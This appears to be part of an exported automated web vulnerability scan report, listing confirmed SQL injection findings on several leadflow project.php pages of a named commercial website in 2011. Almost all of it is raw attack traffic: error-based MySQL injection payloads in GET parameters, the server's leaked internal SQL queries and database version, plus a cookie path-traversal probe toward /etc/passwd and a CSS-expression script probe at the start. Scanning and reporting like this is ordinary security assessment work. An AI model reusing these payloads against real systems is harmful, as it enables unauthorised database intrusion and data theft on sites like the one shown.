OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:18 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=unct3s9hs5novtpifms5a4nlq4; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:1' for key 1
- /ppc/leadflow/phsy00/project.php

/ppc/leadflow/phsy00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId=110009&iusrc='%2B(select+1+and+row(1%2..

Parameters

Parameter Type Value
catId GET 110009
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Extracted Data

5.0.45

Request

GET /ppc/leadflow/phsy00/project.php?catId=110009&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:26:01 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=il1g31fhpk4io0k4bi5mh3sor7; path=/
Content-Length: 4878
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:1' for key 1
- /ppc/leadflow/lgds00/project.php

/ppc/leadflow/lgds00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId=80005&iusrc='%2B(select+1+and+row(1%2c..

Parameters

Parameter Type Value
catId GET 80005
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Extracted Data

5.0.45

Request

GET /ppc/leadflow/lgds00/project.php?catId=80005&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:26:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ca56a19o1tpmn35n39hblthd63; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:0' for key 1
- /ppc/leadflow/inco00/project.php

/ppc/leadflow/inco00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc='%2B(select+1+and+row(1%2c..

Parameters

Parameter Type Value
catId GET 60003
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Extracted Data

5.0.45

Request

GET /ppc/leadflow/inco00/project.php?catId=60003&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=kl7inls2vf4bkeo4oip8q21ea1; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:0' for key 1
- /ppc/leadflow/obtm00/project.php

/ppc/leadflow/obtm00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/obtm00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=b7tsop5103jt1e5o5dbviv3lg1; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on 